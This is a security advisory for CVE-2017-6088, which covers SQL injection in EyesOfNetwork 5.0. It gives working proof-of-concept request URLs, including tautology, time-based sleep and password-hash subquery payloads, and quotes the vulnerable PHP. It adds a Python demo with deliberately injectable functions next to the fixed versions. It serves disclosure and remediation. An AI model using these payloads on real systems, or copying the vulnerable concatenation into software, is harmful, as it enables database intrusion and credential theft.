EON 5.0 SQL Injection

2017-03-24T00:00:00
ID PACKETSTORM:141810
Type packetstorm
Reporter Nicolas Serra
Modified 2017-03-24T00:00:00

Description

# [CVE-2017-6088] EON 5.0 Multiple SQL Injection  
  
## Description  
  
EyesOfNetwork ("EON") is an open-source network monitoring solution.  
  
## SQL injection (authenticated)  
  
The eonweb code does not validate or escape request parameters before  
concatenating them into SQL queries, allowing authenticated users to  
inject arbitrary SQL.  
  
**CVE ID**: CVE-2017-6088  
  
**Access Vector**: remote  
  
**Security Risk**: medium  
  
**Vulnerability**: CWE-89  
  
**CVSS Base Score**: 6.0  
  
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L  
  
### Proof of Concept 1 (root privileges)  
  
The following HTTP requests allow an attacker (logged in as  
administrator) to dump the database contents using SQL injection in  
either the `bp_name` or the `display` parameter. The resulting queries  
are executed with MySQL root privileges.  
  
```  
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271  
  
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1  
```  
  
#### Vulnerable code  
  
The vulnerable code can be found inside the  
`module/monitoring_ged/ged_functions.php` file, line 114:  
  
```  
function list_process($bp,$display,$bdd){  
    // $bp and $display come straight from the request and are concatenated  
    // into quoted literals: a single quote in either one closes the literal  
    // and the remainder of the value is parsed as SQL.  
    $sql = "select name from bp where is_define = 1 and name!='".$bp."' and priority = '" . $display . "'";  
    $req = $bdd->query($sql);  
    $process = $req->fetchall();  
  
    echo json_encode($process);  
}  
```  
  
### Proof of Concept 2  
  
The following HTTP request allows an attacker to dump the database  
contents using SQL injection inside the `type` parameter. The payload is  
a time-based probe: a `sleep(5)` delay in the response confirms that the  
injected expression was evaluated by MySQL.  
  
```  
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=  
```  
  
#### Vulnerable code  
  
The vulnerable code can be found inside the  
`module/monitoring_ged/ajax.php` file, line 64:  
  
```  
// $_GET["type"] is only compared with 0, never validated, before it is  
// concatenated into the WHERE clause.  
if($_GET["type"] == 0){  
    $ged_where = "WHERE pkt_type_id!='0'";  
} else {  
    $ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";  
}  
$gedsql_result1=sqlrequest($database_ged,"SELECT pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");  
```  
  
### Proof of Concept 3  
  
The following HTTP request allows an attacker to dump the database  
contents using SQL injection inside the `search` parameter, again using  
a `sleep(5)` delay to confirm execution:  
  
```  
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=  
```  
  
  
#### Vulnerable code  
  
The vulnerable code can be found inside the  
`module/monitoring_ged/ged_functions.php` file, line 129:  
  
```  
if($search != ""){  
    // A leading or trailing '*' is turned into a SQL wildcard, but the search  
    // term itself is interpolated into the LIKE literal without escaping.  
    // $filter (see Proof of Concept 4) is interpolated as a column name.  
    $like = "";  
    if( substr($search, 0, 1) === '*' ){  
        $like .= "%";  
    }  
    $like .= trim($search, '*');  
    if ( substr($search, -1) === '*' ) {  
        $like .= "%";  
    }  
  
    $where_clause .= " AND $filter LIKE '$like'";  
}  
```  
  
  
### Proof of Concept 4  
  
The following HTTP request allows an attacker to dump the database  
contents using SQL injection inside the `filter` parameter (whose  
legitimate values are column names such as `equipment`). Because the  
value is used as an identifier rather than a quoted literal, a  
parenthesised subquery is accepted directly, here reading the  
`user_passwd` column from the `eonweb.users` table:  
  
```  
https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit+1)&queue=history  
```  
  
  
#### Vulnerable code  
  
The vulnerable code can be found inside the  
`module/monitoring_ged/ged_functions.php` file, line 493:  
  
```  
$gedsql_result1=sqlrequest($database_ged,"SELECT pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND pkt_type_id<'100';");  
  
  
while($ged_type = mysqli_fetch_assoc($gedsql_result1)){  
    // $filter is spliced in as the select list and $queue as part of the table  
    // name. Identifiers cannot be bound as prepared-statement parameters, so  
    // without an allowlist any expression, including a subquery, is accepted.  
    $sql = "SELECT DISTINCT $filter FROM ".$ged_type["pkt_type_name"]."_queue_".$queue;  
  
    $results = sqlrequest($database_ged, $sql);  
    while($result = mysqli_fetch_array($results)){  
        if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){  
            array_push($datas, $result[$filter]);  
        }  
    }  
}  
```  
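
The four findings above fall into two classes that need different fixes: Proofs of Concept 1 to 3 inject into quoted values, which bound parameters remove entirely, while Proof of Concept 4 injects into an identifier, which no prepared statement can protect and which needs an allowlist. The following is an added example, not EyesOfNetwork code: it replays the PoC 1 tautology and the PoC 4 subquery against an in-memory SQLite stand-in for the eonweb and GED MySQL tables, then shows both fixes. The schema, rows, password hash and the `ALLOWED_FILTERS` / `ALLOWED_QUEUES` sets are constructed for the example (the `eonweb.` database prefix from PoC 4 is dropped because SQLite has no cross-database names). The time-based payloads of PoCs 2 and 3 are not replayed because SQLite has no `sleep()`; the same parameter binding fixes them.

```python
"""Added example, not EyesOfNetwork code: replays the PoC 1 tautology and the
PoC 4 column-name injection against an in-memory SQLite stand-in for the
eonweb/GED MySQL tables, then shows the two fixes: bound parameters for
values, an allowlist for identifiers."""
import sqlite3

# Constructed schema and rows; table and column names follow the advisory's
# queries, the password hash is a placeholder, nothing here is real EON data.
SCHEMA = """
CREATE TABLE bp (name TEXT, is_define INTEGER, priority TEXT);
INSERT INTO bp VALUES ('bp_web', 1, '1'), ('bp_mail', 1, '2'), ('bp_draft', 0, '1');
CREATE TABLE users (user_name TEXT, user_passwd TEXT);
INSERT INTO users VALUES ('admin', '$1$constructed$hash');
CREATE TABLE nagios_queue_history (equipment TEXT, service TEXT);
INSERT INTO nagios_queue_history VALUES ('srv-01', 'HTTP'), ('srv-02', 'SMTP');
"""

# Identifiers the GED filter code may accept (assumed allowlist, not EON's).
ALLOWED_FILTERS = frozenset({"equipment", "service"})
ALLOWED_QUEUES = frozenset({"active", "history"})


def connect():
    """Fresh in-memory database populated with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def list_process_vulnerable(db, bp, display):
    """Same concatenation as list_process(): a quote in either argument
    closes the literal and the rest of the input becomes SQL."""
    sql = ("select name from bp where is_define = 1 and name!='" + bp
           + "' and priority = '" + display + "'")
    return [row[0] for row in db.execute(sql)]


def list_process_fixed(db, bp, display):
    """Bound parameters: values travel separately from the SQL text, so the
    PoC 1 payload is matched as a literal priority and returns nothing."""
    sql = "select name from bp where is_define = 1 and name != ? and priority = ?"
    return [row[0] for row in db.execute(sql, (bp, display))]


def is_valid_filter(filter_name, queue):
    """Identifier check used by the fixed GED query below."""
    return filter_name in ALLOWED_FILTERS and queue in ALLOWED_QUEUES


def advanced_filter_vulnerable(db, filter_name, queue):
    """Same shape as the PoC 4 query: $filter is spliced in as a column
    name, so a parenthesised subquery is accepted as the select list."""
    sql = "SELECT DISTINCT " + filter_name + " FROM nagios_queue_" + queue
    return [row[0] for row in db.execute(sql)]


def advanced_filter_fixed(db, filter_name, queue):
    """Column and table names cannot be bound as parameters; reject anything
    outside the allowlist and quote the identifier that survives."""
    if not is_valid_filter(filter_name, queue):
        raise ValueError("rejected filter %r / queue %r" % (filter_name, queue))
    sql = 'SELECT DISTINCT "%s" FROM nagios_queue_%s' % (filter_name, queue)
    return [row[0] for row in db.execute(sql)]


if __name__ == "__main__":
    db = connect()
    poc1 = "'or'1'='1"                                # display payload, PoC 1
    poc4 = "(select user_passwd from users limit 1)"  # filter payload, PoC 4
    print("PoC 1 vulnerable:", list_process_vulnerable(db, "", poc1))
    print("PoC 1 fixed     :", list_process_fixed(db, "", poc1))
    print("PoC 4 vulnerable:", advanced_filter_vulnerable(db, poc4, "history"))
    try:
        advanced_filter_fixed(db, poc4, "history")
    except ValueError as err:
        print("PoC 4 fixed     : rejected:", err)
```

The vulnerable `list_process` returns every row, including the one with `is_define = 0`, because the tautology short-circuits the whole WHERE clause; the bound-parameter version returns nothing for the same input. The vulnerable GED query returns the password hash because the subquery is evaluated as the select list; the fixed version refuses the value before any SQL is built. The same split applies to the PHP code: `$bdd->prepare()` with placeholders for `$bp`, `$display`, `$_GET["type"]` and `$like`, and an explicit allowlist for `$filter` and `$queue`.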
  
  
## Timeline (dd/mm/yyyy)  
  
* 01/10/2016 : Initial discovery.  
* 09/10/2016 : First contact with vendor.  
* 23/10/2016 : Technical details sent to the security contact.  
* 27/10/2016 : Vendor acknowledgement and first patching attempt.  
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.  
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our responsible disclosure agreement.  
* 14/03/2017 : Public disclosure.  
  
Thank you to EON for the fast response.  
  
## Solution  
  
Update to version 5.1.  
  
## Affected versions  
  
* Version <= 5.0  
  
## Credits  
  
* Nicolas SERRA <n.serra@sysdream.com>  
  
--   
SYSDREAM Labs <labs@sysdream.com>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  